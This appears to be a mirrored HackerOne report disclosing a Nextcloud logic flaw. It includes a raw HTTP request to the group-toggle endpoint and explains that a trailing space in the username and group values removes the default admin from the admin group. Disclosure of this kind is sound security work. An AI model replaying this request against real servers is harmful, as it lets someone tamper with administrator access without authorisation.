Nextcloud: Business/Functional logic bypass: Remove admins from admin group.

2016-06-18T18:48:23
ID H1:145745
Type hackerone
Reporter paglababa
Modified 2016-06-19T12:43:16

Description

In nextcloud the default admin can not be removed from his admin group. The group toggle request looks like this:

``` POST /nextcloud/index.php/settings/ajax/togglegroups.php HTTP/1.1 Host: 139.59.9.184 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: JQB5F2pqZwh8OUNVRzwVPxdmKCEbJDssbAUcORtfTVM=:bIHyZZPyIV67tsLPsWgrxCInGdOC40f2yD61Qn4HrTw= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Cookie: oc1jzqgvx8b9=e6gprie4u2ffkq83ivm68ccp80; oc_sessionPassphrase=BL2ccA7kLG%2FpxKWf5znZSBLWSvARKK%2Bv3oLuCFyGd8a5SAqPeeBjIaD88AVnwnMS8ompIL7tN45YiZeeODdFHyPBYZrZAavWsHJqMKZdvU3U6eZUW%2FHCGLMd62y6ty7P; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true Connection: close Content-Length: 25

username=test&group=test ```

If we use admin as the value of username and admin as the value of group ( admin with a trailing space), the admin will be removed from the admin group.